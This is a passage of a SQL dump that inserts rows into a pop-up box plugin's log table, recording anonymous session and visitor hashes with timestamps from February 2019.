(59490, '8f5c67a2305e02c38c1cc665be636671', 'c82195f7827b9487', 0, 2, 1, '2019-02-13 18:03:51'),
(59491, 'efa6059e0c68906b52c2e616f9a85c67', '92fceb3dfbbbaf7f', 0, 2, 1, '2019-02-13 18:04:04'),
(59492, 'd4d931ad0d29ded353293d665872c0e5', 'd86d441339858efd', 0, 2, 1, '2019-02-13 18:04:05'),
(59493, '9e543bcfa0cb5c03c893f7297aa3f960', '4ed2f72cad1fbad2', 0, 2, 1, '2019-02-13 18:04:21'),
(59494, '290eb6031070ef4c00a2ddda289cbfbc', 'c7d4ce8b0de12339', 0, 2, 1, '2019-02-13 18:05:15'),
(59495, 'b96ce2b696f4f646485bb77ccf9583bd', '687058b58830fd3e', 0, 2, 1, '2019-02-13 18:07:48'),
(59496, 'b96ce2b696f4f646485bb77ccf9583bd', '687058b58830fd3e', 0, 2, 1, '2019-02-13 18:08:49'),
(59497, 'd6eed245b021fabbf771f128c6957873', '68e262710bf07c1c', 0, 2, 1, '2019-02-13 18:11:04'),
(59498, '322c75e852f01960063b6212fd392167', '1624785298a8447a', 0, 2, 1, '2019-02-13 18:11:46'),
(59499, 'd637ea28c19f3fe59fd6e7acf61a99f5', '7cb2227c839661ee', 0, 2, 1, '2019-02-13 18:14:02'),
(59500, '371c22febebe431d4fbfd6207688537a', '1d5126c0be496a04', 0, 2, 1, '2019-02-13 18:15:08'),
(59501, 'aa1a47c2712f8e6207b746b814ce3e2a', 'e304122b355f5c81', 0, 2, 1, '2019-02-13 18:16:20'),
(59502, 'cc1f0d2c51b426d80fe349187b886304', '9b4e9691374cabf9', 0, 2, 1, '2019-02-13 18:17:25'),
(59503, 'ed35c27a5c6c07e47d8c4d07829ab973', '0530018377078939', 0, 2, 1, '2019-02-13 18:19:06'),
(59504, '7fe2d1a0b3948cd15051de6b026ac75c', '5e5a1dbcfcc938e1', 0, 2, 1, '2019-02-13 18:25:08'),
(59505, '7fe2d1a0b3948cd15051de6b026ac75c', '5e5a1dbcfcc938e1', 0, 2, 1, '2019-02-13 18:26:30'),
(59506, 'ef43642728dae4a59a17f1aec6ea5aeb', '8ad007cf09224cd8', 0, 2, 1, '2019-02-13 18:28:33'),
(59507, '6231a9e2f0ca5ef72c74d9cbcf819f3f', '1b5e475496daa72c', 0, 2, 1, '2019-02-13 18:31:29'),
(59508, 'af23520fb5d76df0083de80dfc6b3ce5', '417b807dff7c6249', 0, 2, 1, '2019-02-13 18:37:01'),
(59509, '495941e51167ed67e023e2225829c8b1', '06e399ab1ee4dc2e', 0, 2, 1, '2019-02-13 18:37:13'),
(59510, '833261d3154af043ddb2aad69137bd90', '6092d6c1cb041b23', 0, 2, 1, '2019-02-13 18:38:54'),
(59511, 'adba96d6b20f3ced4762c96cbd310de0', '57587ada79ea2aa6', 0, 2, 1, '2019-02-13 18:41:09'),
(59512, '462ab209fb1b168ffc77dc309bf6462b', '29608a328df169fa', 0, 2, 1, '2019-02-13 18:56:17'),
(59513, '462ab209fb1b168ffc77dc309bf6462b', '29608a328df169fa', 0, 2, 1, '2019-02-13 18:58:31'),
(59514, '24774f79372fe297770f51a21e2c4ad2', 'd8923e60c6dca0dc', 0, 2, 1, '2019-02-13 18:58:53'),
(59515, 'c89d369dcf57829a9de29bdcac81c956', '1d9ef67a5a620bf4', 0, 2, 1, '2019-02-13 19:02:50'),
(59516, 'c89d369dcf57829a9de29bdcac81c956', '1d9ef67a5a620bf4', 0, 2, 1, '2019-02-13 19:03:19'),
(59517, 'e3640301b258f7b6ca8512e1e61faccc', 'a639f655bef0fc87', 0, 2, 1, '2019-02-13 19:10:38'),
(59518, '3f74ecc83560823579b5407ce7ac9106', '3a9ea7f2799c2103', 0, 2, 1, '2019-02-13 19:10:50'),
(59519, '6fb173598a4217a50398909c90e5c907', '51597bf7a3572f16', 0, 2, 1, '2019-02-13 19:21:08'),
(59520, '462ab209fb1b168ffc77dc309bf6462b', '29608a328df169fa', 0, 2, 1, '2019-02-13 19:23:58'),
(59521, '462ab209fb1b168ffc77dc309bf6462b', '29608a328df169fa', 0, 2, 1, '2019-02-13 19:24:47'),
(59522, 'e3640301b258f7b6ca8512e1e61faccc', 'a639f655bef0fc87', 0, 2, 1, '2019-02-13 19:28:03'),
(59523, '24774f79372fe297770f51a21e2c4ad2', 'd8923e60c6dca0dc', 0, 2, 1, '2019-02-13 19:28:56'),
(59524, 'e3640301b258f7b6ca8512e1e61faccc', 'a639f655bef0fc87', 0, 2, 1, '2019-02-13 19:32:18'),
(59525, 'c9bb129678eaf0b61cdc5a553e718297', '1de090ec808c88cc', 0, 2, 1, '2019-02-13 19:34:31'),
(59526, 'e3640301b258f7b6ca8512e1e61faccc', 'a639f655bef0fc87', 0, 2, 1, '2019-02-13 19:35:45'),
(59527, 'd77cb7e378ba7baed48ee33b3bc75f51', 'c020abbb40884763', 0, 2, 1, '2019-02-13 19:36:03'),
(59528, 'd77cb7e378ba7baed48ee33b3bc75f51', 'c020abbb40884763', 0, 2, 1, '2019-02-13 19:36:12'),
(59529, '315183a37663a1b863e5d53d9d917e43', '93f30eaefda9d8c4', 0, 2, 1, '2019-02-13 19:39:21'),
(59530, 'e3640301b258f7b6ca8512e1e61faccc', 'a639f655bef0fc87', 0, 2, 1, '2019-02-13 19:39:46'),
(59531, '80fa2e06e98653891416b267fe622080', '0f7815dc74d24cdd', 0, 2, 1, '2019-02-13 19:40:59'),
(59532, '874a76828fc927285faa53a8ad792462', 'd33c6b62c31a5365', 0, 2, 1, '2019-02-13 19:53:12'),
(59533, 'd061fbeaaef6fc719c1ec00426151350', '9a903552e28cf43c', 0, 2, 1, '2019-02-13 19:53:20'),
(59534, 'd061fbeaaef6fc719c1ec00426151350', '9a903552e28cf43c', 0, 2, 1, '2019-02-13 19:53:31'),
(59535, 'e3640301b258f7b6ca8512e1e61faccc', 'a639f655bef0fc87', 0, 2, 1, '2019-02-13 19:54:01'),
(59536, '1bd533de4a90f7921728033aaaa5679d', '3298eb578e8c9556', 0, 2, 1, '2019-02-13 20:06:58'),
(59537, 'c195b870c6e5370f31d626deca7bc8a5', 'e3413f2163c4f64a', 0, 2, 1, '2019-02-13 20:16:01'),
(59538, 'd509eee37ad395bb347a40121e704eab', 'd54c3f2a26caf902', 0, 2, 1, '2019-02-13 20:33:04'),
(59539, '231afe9b6b35a8228cfe3f87d6b0a544', '01fdb7c90a5b16d4', 0, 2, 1, '2019-02-13 20:43:38'),
(59540, '18c19732b52ad632f4de054016a263a7', '3ba3484de462963c', 0, 2, 1, '2019-02-13 20:59:27'),
(59541, '18c19732b52ad632f4de054016a263a7', '3ba3484de462963c', 0, 2, 1, '2019-02-13 20:59:43'),
(59542, 'bcb1227686d0ddb5e885fa731da9d844', 'dba6d1f10a1d88b7', 0, 2, 1, '2019-02-13 21:09:03'),
(59543, '41109e2256c672160a62e805dc60ffa1', '13cef000f51434fe', 0, 2, 1, '2019-02-13 21:12:33'),
(59544, '33f6ba33e9005fa9df254bb88a60f8fc', 'c9b7d6b8da194839', 0, 2, 1, '2019-02-13 21:21:31'),
(59545, 'eb967dd424da380b8d4a5a84856dcdd3', 'ed26a20669839c19', 0, 2, 1, '2019-02-13 21:38:28'),
(59546, 'eb967dd424da380b8d4a5a84856dcdd3', 'ed26a20669839c19', 0, 2, 1, '2019-02-13 21:41:09'),
(59547, 'eb967dd424da380b8d4a5a84856dcdd3', 'ed26a20669839c19', 0, 2, 1, '2019-02-13 21:41:22'),
(59548, 'eb967dd424da380b8d4a5a84856dcdd3', 'ed26a20669839c19', 0, 2, 1, '2019-02-13 21:42:39'),
(59549, 'eb967dd424da380b8d4a5a84856dcdd3', 'ed26a20669839c19', 0, 2, 1, '2019-02-13 21:42:52'),
(59550, 'eb967dd424da380b8d4a5a84856dcdd3', 'ed26a20669839c19', 0, 2, 1, '2019-02-13 21:43:34'),
(59551, 'eb967dd424da380b8d4a5a84856dcdd3', 'ed26a20669839c19', 0, 2, 1, '2019-02-13 21:44:09'),
(59552, 'e0fb27505597cd2ff533e94d154b6517', '33bb13250826d76c', 0, 2, 1, '2019-02-13 21:45:08');
INSERT INTO `y57u5_rstbox_logs` (`id`, `sessionid`, `visitorid`, `user`, `box`, `event`, `date`) VALUES
(59553, 'e0fb27505597cd2ff533e94d154b6517', '33bb13250826d76c', 0, 2, 1, '2019-02-13 21:45:50'),
(59554, 'c76f982d2c0138f99d874a184dc63700', '7ded89fd55073840', 0, 2, 1, '2019-02-13 21:47:17'),
(59555, '73d8a606dfc052ad2059eea84e5ade20', 'e1badb66197f6c1a', 0, 2, 1, '2019-02-13 21:52:05'),
(59556, '3c9e9cc717295976e2c32d523b913907', '4464b10310c4a85c', 0, 2, 1, '2019-02-13 22:02:30'),
(59557, 'f74e8d4c14d9293d680619e84978236c', 'e6ebdb71c6e52424', 0, 2, 1, '2019-02-13 22:17:23'),
(59558, 'f74e8d4c14d9293d680619e84978236c', 'e6ebdb71c6e52424', 0, 2, 1, '2019-02-13 22:17:53'),
(59559, 'f74e8d4c14d9293d680619e84978236c', 'e6ebdb71c6e52424', 0, 2, 1, '2019-02-13 22:20:31'),
(59560, 'e6fbbf565c6ebad0c98e2eec0e8b12e6', '3fd41de0107a561d', 0, 2, 1, '2019-02-13 22:30:12'),
(59561, '5d57862f42e09cecabb713d8bf3d08bc', 'b45067eda1a5dab0', 0, 2, 1, '2019-02-13 22:43:10'),
(59562, '5d57862f42e09cecabb713d8bf3d08bc', 'b45067eda1a5dab0', 0, 2, 1, '2019-02-13 22:44:50'),
(59563, '5d57862f42e09cecabb713d8bf3d08bc', 'b45067eda1a5dab0', 0, 2, 1, '2019-02-13 22:45:36'),
(59564, '5d57862f42e09cecabb713d8bf3d08bc', 'b45067eda1a5dab0', 0, 2, 1, '2019-02-13 22:45:50'),
(59565, '5d57862f42e09cecabb713d8bf3d08bc', 'b45067eda1a5dab0', 0, 2, 1, '2019-02-13 22:46:02'),
(59566, '5d57862f42e09cecabb713d8bf3d08bc', 'b45067eda1a5dab0', 0, 2, 1, '2019-02-13 22:46:25'),
(59567, 'c3aa850dc330f2498455cd301114b9b3', '23faa6983ed0fd4b', 0, 2, 1, '2019-02-13 22:46:44'),
(59568, '5d57862f42e09cecabb713d8bf3d08bc', 'b45067eda1a5dab0', 0, 2, 1, '2019-02-13 22:48:41'),
(59569, '5d57862f42e09cecabb713d8bf3d08bc', 'b45067eda1a5dab0', 0, 2, 1, '2019-02-13 22:51:23'),
(59570, '5d57862f42e09cecabb713d8bf3d08bc', 'b45067eda1a5dab0', 0, 2, 1, '2019-02-13 22:53:29'),
(59571, '5d57862f42e09cecabb713d8bf3d08bc', 'b45067eda1a5dab0', 0, 2, 1, '2019-02-13 22:54:03'),
(59572, '3c0a3915e2c77e0e5033c079c5f2ec72', 'cae515205265db0e', 0, 2, 1, '2019-02-13 22:55:40'),
(59573, 'b5e56017bb31d6f34e8d761a48fadf86', '5601accbae95454c', 0, 2, 1, '2019-02-13 22:57:51'),
(59574, '5b472fdd450a5ebd12f9524559a15168', '67af5855238e29e3', 0, 2, 1, '2019-02-13 23:18:40'),
(59575, '5b472fdd450a5ebd12f9524559a15168', '67af5855238e29e3', 0, 2, 1, '2019-02-13 23:18:55'),
(59576, '5b472fdd450a5ebd12f9524559a15168', '67af5855238e29e3', 0, 2, 1, '2019-02-13 23:21:18'),
(59577, 'dc95ad10ac6be751592903b5f7b75cf3', 'fe961668877fa513', 0, 2, 1, '2019-02-13 23:58:53'),
(59578, 'dc95ad10ac6be751592903b5f7b75cf3', 'fe961668877fa513', 0, 2, 1, '2019-02-13 23:59:29'),
(59579, '5b472fdd450a5ebd12f9524559a15168', '67af5855238e29e3', 0, 2, 1, '2019-02-14 00:11:00'),
(59580, '5b472fdd450a5ebd12f9524559a15168', '67af5855238e29e3', 0, 2, 1, '2019-02-14 00:13:32'),
(59581, '5b472fdd450a5ebd12f9524559a15168', '67af5855238e29e3', 0, 2, 1, '2019-02-14 00:20:32'),
(59582, '27691a6cebf266ad039037ee20d0778a', '84e482f073f9d96e', 0, 2, 1, '2019-02-14 00:45:53'),
(59583, '5b472fdd450a5ebd12f9524559a15168', '67af5855238e29e3', 0, 2, 1, '2019-02-14 00:50:41'),
(59584, '5b472fdd450a5ebd12f9524559a15168', '67af5855238e29e3', 0, 2, 1, '2019-02-14 00:50:59'),
(59585, '5b472fdd450a5ebd12f9524559a15168', '67af5855238e29e3', 0, 2, 1, '2019-02-14 00:51:47'),
(59586, '345eb94d83ed53ef888eeb145f3d7fb2', 'f13c36d39eaf8103', 0, 2, 1, '2019-02-14 00:52:18'),
(59587, '5b472fdd450a5ebd12f9524559a15168', '67af5855238e29e3', 0, 2, 1, '2019-02-14 00:54:25'),
(59588, '5b472fdd450a5ebd12f9524559a15168', '67af5855238e29e3', 0, 2, 1, '2019-02-14 00:54:50'),
(59589, '5b472fdd450a5ebd12f9524559a15168', '67af5855238e29e3', 0, 2, 1, '2019-02-14 01:24:44'),
(59590, '5b472fdd450a5ebd12f9524559a15168', '67af5855238e29e3', 0, 2, 1, '2019-02-14 01:25:54'),
(59591, '5b472fdd450a5ebd12f9524559a15168', '67af5855238e29e3', 0, 2, 1, '2019-02-14 01:26:29'),
(59592, '5b472fdd450a5ebd12f9524559a15168', '67af5855238e29e3', 0, 2, 1, '2019-02-14 01:27:01'),
(59593, 'd379c134698eafe7a5a03b99627c563e', '1909a8a5ece53d11', 0, 2, 1, '2019-02-14 01:28:43'),
(59594, '5b472fdd450a5ebd12f9524559a15168', '67af5855238e29e3', 0, 2, 1, '2019-02-14 01:44:15'),
(59595, '5b472fdd450a5ebd12f9524559a15168', '67af5855238e29e3', 0, 2, 1, '2019-02-14 01:48:12'),
(59596, 'd8ecfa3f760264dd00ffff7069238c8f', 'b2bafb74467116e9', 0, 2, 1, '2019-02-14 03:20:53'),
(59597, '64ae8507973954077720b1668b9286ff', 'ebf0fcd900b70586', 0, 2, 1, '2019-02-14 03:49:49'),
(59598, 'eb967dd424da380b8d4a5a84856dcdd3', 'ed26a20669839c19', 0, 2, 1, '2019-02-14 04:40:16'),
(59599, 'db8d92ad28e3151dcb9936601f93be04', 'a6ca3ab69c23b657', 0, 2, 1, '2019-02-14 04:45:25'),
(59600, 'a38cf00bc5226e2a9d0cde399d958542', 'fbf0576065758144', 0, 2, 1, '2019-02-14 04:56:14'),
(59601, 'c5eca6a74eb9984740514551e4e2161b', 'bb66c83c4adfc3b7', 0, 2, 1, '2019-02-14 06:19:38'),
(59602, 'c5eca6a74eb9984740514551e4e2161b', 'bb66c83c4adfc3b7', 0, 2, 1, '2019-02-14 06:27:34'),
(59603, '3105f3e1f71e93989fdee6237416a6d6', '2fb46acc462f03ad', 0, 2, 1, '2019-02-14 06:37:40'),
(59604, '6d2c021fa7e26fdf6a8612809df91728', '5645ad90d2daab66', 0, 2, 1, '2019-02-14 06:50:13'),
(59605, 'c5eca6a74eb9984740514551e4e2161b', 'bb66c83c4adfc3b7', 0, 2, 1, '2019-02-14 07:07:30'),
(59606, 'ff88e11114d7ff1d0abc37a5511f2110', '62eca6e4fcbc132a', 0, 2, 1, '2019-02-14 08:51:18'),
(59607, '23639b28fa29581e0d89069f4f46bc02', '00a51499b80347cc', 0, 2, 1, '2019-02-14 08:51:31'),
(59608, '23639b28fa29581e0d89069f4f46bc02', '00a51499b80347cc', 0, 2, 1, '2019-02-14 08:51:46'),
(59609, '23639b28fa29581e0d89069f4f46bc02', '00a51499b80347cc', 0, 2, 1, '2019-02-14 08:52:14'),
(59610, 'c2e3847bcdd37d731803b904498a1e36', 'eaef560a5c7434bb', 0, 2, 1, '2019-02-14 09:11:59'),
(59611, '6b9dbeb7113d566650136a811d308a3b', '6092d6c1cb041b23', 0, 2, 1, '2019-02-14 09:22:17'),
(59612, '80fa2e06e98653891416b267fe622080', '0f7815dc74d24cdd', 0, 2, 1, '2019-02-14 09:42:42'),
(59613, '1b556cf4104ba999443a7fbde0775923', '5a3b746dd44a35f1', 0, 2, 1, '2019-02-14 09:42:56'),
(59614, '1b556cf4104ba999443a7fbde0775923', '5a3b746dd44a35f1', 0, 2, 1, '2019-02-14 09:44:05'),
(59615, '4ada4205240b9b586a3b3ff20db1a428', 'bbc3234392530d16', 0, 2, 1, '2019-02-14 09:58:36'),
(59616, '4ada4205240b9b586a3b3ff20db1a428', 'bbc3234392530d16', 0, 2, 1, '2019-02-14 10:02:55'),
(59617, 'f2430c3450f8b39a5d9e6cf302b31ce9', '9a903552e28cf43c', 0, 2, 1, '2019-02-14 10:09:29'),
(59618, '622da5ba930e6821cc2a736e8f6f88ed', '95c86b409c486b85', 0, 2, 1, '2019-02-14 10:35:03'),
(59619, 'd67737f10716395592bd51bc1a1fbf71', '62eca6e4fcbc132a', 0, 2, 1, '2019-02-14 10:44:26'),
(59620, '6c04ea658b689756be64cb10e5334b97', 'ec298f16abca1ffa', 0, 2, 1, '2019-02-14 10:52:05'),
(59621, '6c04ea658b689756be64cb10e5334b97', 'ec298f16abca1ffa', 0, 2, 1, '2019-02-14 10:53:03'),
(59622, '6c04ea658b689756be64cb10e5334b97', 'ec298f16abca1ffa', 0, 2, 1, '2019-02-14 10:53:31'),
(59623, '6c04ea658b689756be64cb10e5334b97', 'ec298f16abca1ffa', 0, 2, 1, '2019-02-14 10:54:23'),
(59624, '6c04ea658b689756be64cb10e5334b97', 'ec298f16abca1ffa', 0, 2, 1, '2019-02-14 10:59:20'),
(59625, '6c04ea658b689756be64cb10e5334b97', 'ec298f16abca1ffa', 0, 2, 1, '2019-02-14 10:59:53'),
(59626, '6c04ea658b689756be64cb10e5334b97', 'ec298f16abca1ffa', 0, 2, 1, '2019-02-14 11:00:19'),
(59627, '6c04ea658b689756be64cb10e5334b97', 'ec298f16abca1ffa', 0, 2, 1, '2019-02-14 11:00:39'),
(59628, '6c04ea658b689756be64cb10e5334b97', 'ec298f16abca1ffa', 0, 2, 1, '2019-02-14 11:00:58'),
(59629, 'c1fbe3f75d0c0cc48c65fcf03abdbb6e', 'bb0a010e5ba99390', 0, 2, 1, '2019-02-14 11:28:14'),
(59630, 'dd50561eb2068f5929d820808b09b59a', 'ffd9c9d5aec3c459', 0, 2, 1, '2019-02-14 11:42:14'),
(59631, '54c94195359f4cb6648f60454283f971', 'f889bef4465b119a', 0, 2, 1, '2019-02-14 11:54:15'),
(59632, '5db3981933cb5a5a21d8b500b35bb6f9', '90ce058fa43a218f', 0, 2, 1, '2019-02-14 12:40:44'),
(59633, '5db3981933cb5a5a21d8b500b35bb6f9', '90ce058fa43a218f', 0, 2, 1, '2019-02-14 12:57:47'),
(59634, '5db3981933cb5a5a21d8b500b35bb6f9', '90ce058fa43a218f', 0, 2, 1, '2019-02-14 12:58:23'),
(59635, '5db3981933cb5a5a21d8b500b35bb6f9', '90ce058fa43a218f', 0, 2, 1, '2019-02-14 12:59:08'),
(59636, '5db3981933cb5a5a21d8b500b35bb6f9', '90ce058fa43a218f', 0, 2, 1, '2019-02-14 12:59:29'),
(59637, '06a434d5eff2a3f053c3c1364950de98', '88b9ebfa6a8ba608', 0, 2, 1, '2019-02-14 13:10:01'),
(59638, 'dde5de4d396f7dec01c66f99b075a6ae', '2117e12f3af15459', 0, 2, 1, '2019-02-14 13:20:54'),
(59639, '47dd77acd9375b0c6232a2ea2cda2607', '4ca9f0ede9d015c8', 0, 2, 1, '2019-02-14 13:41:31'),
(59640, 'c5eca6a74eb9984740514551e4e2161b', 'bb66c83c4adfc3b7', 0, 2, 1, '2019-02-14 13:53:49'),
(59641, '841902f48bf8c1f50a1e2fa165461460', 'a0dbd0c61d4cac11', 0, 2, 1, '2019-02-14 14:06:12'),
(59642, '7670faae24f49045c3cc050ff1019727', 'b8bf91bd0500eef1', 0, 2, 1, '2019-02-14 14:08:59'),
(59643, '6c04ea658b689756be64cb10e5334b97', 'ec298f16abca1ffa', 0, 2, 1, '2019-02-14 14:40:40'),
(59644, '0df868287a10ce4db8808c16c6ef8670', 'd8dbbf605c54d2a8', 0, 2, 1, '2019-02-14 15:26:58'),
(59645, '0df868287a10ce4db8808c16c6ef8670', 'd8dbbf605c54d2a8', 0, 2, 1, '2019-02-14 15:33:52'),
(59646, '0df868287a10ce4db8808c16c6ef8670', 'd8dbbf605c54d2a8', 0, 2, 1, '2019-02-14 15:35:32'),
(59647, '37ce82257ebeee7a9e8c9082b2037b30', '0530018377078939', 0, 2, 1, '2019-02-14 15:47:47'),
(59648, '0df868287a10ce4db8808c16c6ef8670', 'd8dbbf605c54d2a8', 0, 2, 1, '2019-02-14 15:49:17'),
(59649, '0df868287a10ce4db8808c16c6ef8670', 'd8dbbf605c54d2a8', 0, 2, 1, '2019-02-14 15:49:49'),
(59650, '0df868287a10ce4db8808c16c6ef8670', 'd8dbbf605c54d2a8', 0, 2, 1, '2019-02-14 15:49:54'),
(59651, '0df868287a10ce4db8808c16c6ef8670', 'd8dbbf605c54d2a8', 0, 2, 1, '2019-02-14 15:50:03'),
(59652, '0df868287a10ce4db8808c16c6ef8670', 'd8dbbf605c54d2a8', 0, 2, 1, '2019-02-14 15:50:25'),
(59653, '0df868287a10ce4db8808c16c6ef8670', 'd8dbbf605c54d2a8', 0, 2, 1, '2019-02-14 15:50:34'),
(59654, '0df868287a10ce4db8808c16c6ef8670', 'd8dbbf605c54d2a8', 0, 2, 1, '2019-02-14 15:52:33'),
(59655, '0df868287a10ce4db8808c16c6ef8670', 'd8dbbf605c54d2a8', 0, 2, 1, '2019-02-14 15:53:16'),
(59656, '0df868287a10ce4db8808c16c6ef8670', 'd8dbbf605c54d2a8', 0, 2, 1, '2019-02-14 15:53:23'),
(59657, '0df868287a10ce4db8808c16c6ef8670', 'd8dbbf605c54d2a8', 0, 2, 1, '2019-02-14 15:53:35'),
(59658, 'c884802fa709ecc8899c3913abe82ef5', '483313bcaa5a7274', 0, 2, 1, '2019-02-14 16:02:07'),
(59659, 'c884802fa709ecc8899c3913abe82ef5', '483313bcaa5a7274', 0, 2, 1, '2019-02-14 16:03:14'),
(59660, '461b1ae5061df37933ffd18b399854b8', '65fb1a08fe2b5aab', 0, 2, 1, '2019-02-14 16:10:40'),
(59661, '73331c32a8eeb991fc356199d71653bd', '7ae00a1c79981cca', 0, 2, 1, '2019-02-14 16:12:08'),
(59662, '461b1ae5061df37933ffd18b399854b8', '65fb1a08fe2b5aab', 0, 2, 1, '2019-02-14 16:15:24'),
(59663, '461b1ae5061df37933ffd18b399854b8', '65fb1a08fe2b5aab', 0, 2, 1, '2019-02-14 16:20:30'),
(59664, '94d1bcee0cd48677731fe3e474ff46be', '8d811e7cdc398874', 0, 2, 1, '2019-02-14 16:29:00'),
(59665, '752e7e3e76f5ff64a0f4853726bc9162', '7977dbf6298b3e61', 0, 2, 1, '2019-02-14 17:13:56'),
(59666, 'ef458cd393c8abd084e42c2a299cd433', '291e7d7d6a842be5', 0, 2, 1, '2019-02-14 17:45:59'),
(59667, '59b360668bb0bc027d9ec42b8f7114ac', 'b45067eda1a5dab0', 0, 2, 1, '2019-02-14 17:46:19'),
(59668, '59b360668bb0bc027d9ec42b8f7114ac', 'b45067eda1a5dab0', 0, 2, 1, '2019-02-14 17:46:51'),
(59669, '59b360668bb0bc027d9ec42b8f7114ac', 'b45067eda1a5dab0', 0, 2, 1, '2019-02-14 17:47:04'),
(59670, '59b360668bb0bc027d9ec42b8f7114ac', 'b45067eda1a5dab0', 0, 2, 1, '2019-02-14 17:47:22'),
(59671, 'c195b870c6e5370f31d626deca7bc8a5', 'e3413f2163c4f64a', 0, 2, 1, '2019-02-14 17:58:18'),
(59672, '19d61590f2739e300ac0d0a932552ad7', '785c694eb4628553', 0, 2, 1, '2019-02-14 18:08:32'),
(59673, 'ef458cd393c8abd084e42c2a299cd433', '291e7d7d6a842be5', 0, 2, 1, '2019-02-14 18:19:16'),
(59674, 'ef458cd393c8abd084e42c2a299cd433', '291e7d7d6a842be5', 0, 2, 1, '2019-02-14 18:26:49'),
(59675, 'ef458cd393c8abd084e42c2a299cd433', '291e7d7d6a842be5', 0, 2, 1, '2019-02-14 18:27:14'),
(59676, '51fe6fb2b3e4675784dc4fc2b3980cf2', '58fb277f17ed8cfb', 0, 2, 1, '2019-02-14 18:43:31'),
(59677, 'ad50cd50e31dca5a6162b9617dc87f69', 'e3413f2163c4f64a', 0, 2, 1, '2019-02-14 20:42:58'),
(59678, '2ce86ebc3c7bf20be4f8b250699c36d0', 'cd84610bb2f615f5', 0, 2, 1, '2019-02-14 20:44:20'),
(59679, 'fe4df3660039150e575e9af2038a6cb1', 'f416d68f97fd05d9', 0, 2, 1, '2019-02-14 21:16:38'),
(59680, '4aba4af9eb58adca40a90a2184ef0eaa', '01280373b3349337', 0, 2, 1, '2019-02-14 21:21:32'),
(59681, '1187c5a173a7544d2b46254fd922eb6f', 'e95ef124f6dfb9b1', 0, 2, 1, '2019-02-14 21:42:29'),
(59682, '26cb75e2e85022e0db2ac221f0969541', 'db77d410aaf2bd6c', 0, 2, 1, '2019-02-14 21:49:38'),
(59683, 'b3243882343d54a8b290e1d2fbac7d44', 'cf5617742372eed7', 0, 2, 1, '2019-02-14 22:10:18'),
(59684, '55f0d6b99da2e2daa1ea0ba7d4569aa8', 'b3fb8540efdab4b7', 0, 2, 1, '2019-02-14 22:23:02'),
(59685, 'd1b78a8a95204c8d5556572f743791a8', 'e240ee9ebc06f135', 0, 2, 1, '2019-02-14 22:23:47'),
(59686, '55f0d6b99da2e2daa1ea0ba7d4569aa8', 'b3fb8540efdab4b7', 0, 2, 1, '2019-02-14 22:51:56'),
(59687, '65f5445fe18b441485a733853dac499d', 'f0edb1bf696022f0', 0, 2, 1, '2019-02-14 22:52:36'),
(59688, 'b3766c7fdfe6c499f6ffbec029e9eb1a', 'ae51a3cad53cf99b', 0, 2, 1, '2019-02-14 23:18:59'),
(59689, 'b3766c7fdfe6c499f6ffbec029e9eb1a', 'ae51a3cad53cf99b', 0, 2, 1, '2019-02-14 23:19:24'),
(59690, 'b3766c7fdfe6c499f6ffbec029e9eb1a', 'ae51a3cad53cf99b', 0, 2, 1, '2019-02-14 23:22:59'),
(59691, 'b3766c7fdfe6c499f6ffbec029e9eb1a', 'ae51a3cad53cf99b', 0, 2, 1, '2019-02-14 23:23:13'),
(59692, 'b3766c7fdfe6c499f6ffbec029e9eb1a', 'ae51a3cad53cf99b', 0, 2, 1, '2019-02-14 23:23:48'),
(59693, 'b3766c7fdfe6c499f6ffbec029e9eb1a', 'ae51a3cad53cf99b', 0, 2, 1, '2019-02-14 23:25:36'),
(59694, 'b3766c7fdfe6c499f6ffbec029e9eb1a', 'ae51a3cad53cf99b', 0, 2, 1, '2019-02-14 23:25:55'),
(59695, 'b3766c7fdfe6c499f6ffbec029e9eb1a', 'ae51a3cad53cf99b', 0, 2, 1, '2019-02-14 23:26:15'),
(59696, 'b3766c7fdfe6c499f6ffbec029e9eb1a', 'ae51a3cad53cf99b', 0, 2, 1, '2019-02-14 23:26:43'),
(59697, 'b3766c7fdfe6c499f6ffbec029e9eb1a', 'ae51a3cad53cf99b', 0, 2, 1, '2019-02-14 23:26:57'),
(59698, '769c227ed73d62bd9452eaeb1d314b09', 'efa537fa43e828f3', 0, 2, 1, '2019-02-14 23:53:42'),
(59699, '5ac9af083de0f3c9b82c96de8f840dd0', 'a2b92167f54c9dc2', 0, 2, 1, '2019-02-14 23:55:09'),
(59700, '76907bdf58220fa2a469b37e60a90b10', 'b3c42b5437711477', 0, 2, 1, '2019-02-15 00:11:08'),
(59701, '1bb7b5bc5092a034e4b6ff4c457969ef', 'e9d7bf3f6b21c215', 0, 2, 1, '2019-02-15 01:01:47'),
(59702, '929d7ecdcef973eba1e2e8577178ab63', 'e997d4392fd64416', 0, 2, 1, '2019-02-15 03:37:53'),
(59703, '2eca036ad3be5472905e8c834a23df97', '2fa458d0337a4355', 0, 2, 1, '2019-02-15 03:43:37'),
(59704, '2eca036ad3be5472905e8c834a23df97', '2fa458d0337a4355', 0, 2, 1, '2019-02-15 03:44:00'),
(59705, '8e9164741571cfa415bb8874360e2fbf', 'cbb06dce5df32863', 0, 2, 1, '2019-02-15 04:02:50'),
(59706, '8e9164741571cfa415bb8874360e2fbf', 'cbb06dce5df32863', 0, 2, 1, '2019-02-15 04:02:53'),
(59707, '8e9164741571cfa415bb8874360e2fbf', 'cbb06dce5df32863', 0, 2, 1, '2019-02-15 04:04:54'),
(59708, '6bf710db0e4308b1e9b8242ffc7af43d', 'ea9b1940d72ef546', 0, 2, 1, '2019-02-15 04:34:39'),
(59709, '6804667b68ef8f7cb69cc45fe1574cd8', '23e3d10a8159fca6', 0, 2, 1, '2019-02-15 05:11:16'),
(59710, '9fa45489e011984cdf5bb0231009484b', '01280373b3349337', 0, 2, 1, '2019-02-15 05:24:57'),
(59711, '9fa45489e011984cdf5bb0231009484b', '01280373b3349337', 0, 2, 1, '2019-02-15 05:53:50'),
(59712, 'bd34fa25490dc6bdf6cd6f07d66f65a8', 'a27e5cb85fbb7e11', 0, 2, 1, '2019-02-15 06:59:20'),
(59713, '61adb0d9cc07771e8a5ff25b259698a5', '6fd7ec8f01666ea1', 0, 2, 1, '2019-02-15 07:33:32'),
(59714, '68b63d0a3f9d4ad26e8b193c896f9aba', '8405492ee9516e30', 0, 2, 1, '2019-02-15 07:39:02'),
(59715, '73b4c64bf9c1934f88ea11a52b17a88c', '5e1dd91b426ab341', 0, 2, 1, '2019-02-15 08:03:48'),
(59716, '07554910a1deebbe2922571dc7b2e7b6', '56b37d07009626a0', 0, 2, 1, '2019-02-15 08:11:49'),
(59717, '7b21f38d78f706f78217f63071100752', '6cfd85fb59e124d1', 0, 2, 1, '2019-02-15 08:45:03'),
